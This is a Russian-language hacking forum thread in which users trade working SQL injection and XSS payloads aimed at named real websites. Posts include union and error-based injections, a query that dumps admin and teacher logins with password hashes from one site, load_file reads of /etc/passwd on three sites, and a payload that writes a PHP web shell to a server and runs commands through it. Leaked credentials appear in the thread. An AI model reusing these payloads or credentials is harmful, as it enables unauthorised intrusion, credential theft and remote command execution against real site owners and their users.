Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. MrFear41

    MrFear41 New Member

    Joined:
    11 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Exploit :
    Boolean Based SQL Injection

    Code:
    http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
     
  2. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    Gorev likes this.
  3. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    #243 SeytaR, 4 Feb 2017
    Last edited by a moderator: 12 Feb 2017
  4. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
  5. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
  6. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    SQL INJECTION DRONES LAB

    https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX

    droneslab@localhost : droneslab_website : 10.1.18-MariaDB

    USER_PRIVILEGES:droneslab'@'localhost' -> NO
     
  7. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    119
    Likes Received:
    47
    Reputations:
    14
    Firefox

    Code:
    http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
    [​IMG]
     
    lolidoli and SeytaR like this.
  8. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    120
    Likes Received:
    55
    Reputations:
    7
    Blind SQL injection

    agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
    В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

    Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки (<, >) весь остальной текст удаляется.
     
    #248 leksadin, 10 Feb 2017
    Last edited: 17 Feb 2017
  9. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  10. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
     
    _________________________
  11. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    120
    Likes Received:
    55
    Reputations:
    7

    Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.

    Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
     
  12. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    496
    Reputations:
    154
    Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
     
    _________________________
    leksadin likes this.
  13. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,562
    Reputations:
    40
    PHP:
    http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa
    Есть ещё всяких много разных, если будет интерес буду выкладывать редко
     
    pastword and leksadin like this.
  15. pastword

    pastword New Member

    Joined:
    19 Feb 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
     
    #255 pastword, 16 Mar 2017
    Last edited: 17 Mar 2017
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,562
    Reputations:
    40
    Думал что- же такое. В итоге оказался пустяк.
    PHP:
    http://randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c7365202020756e696f6e2073656c65637420312c322c7573657228292c342c352c36,2,3,4,5,6
    Просто не обычно
     
    leksadin and t0ma5 like this.
  17. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://uzswlu.uz
    type: SQL Injection
    Code:
    http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+
     
  18. pastword

    pastword New Member

    Joined:
    19 Feb 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Sql-inject
    Code:
    http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID=
    
    admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d
    teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7
     
  19. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    41
    Likes Received:
    23
    Reputations:
    17
    Несколько SQLi с чтением файла из файловой системы
    Code:
    http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806
    Здесь вывод в title
    Code:
    view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0
    Некий шоп с фармой
    Code:
    http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0
     
    palec2006 likes this.
  20. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    41
    Likes Received:
    23
    Reputations:
    17
    Запись минишела через SQLi и выполнение команд на сервере.
    Code:
    http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'<?php system($_GET[cmd]);?>',5,6,7 into outfile '/var/www/html/xux.php' --+
    http://www.hamber.net/xux.php?cmd=ls -l
     
Loading...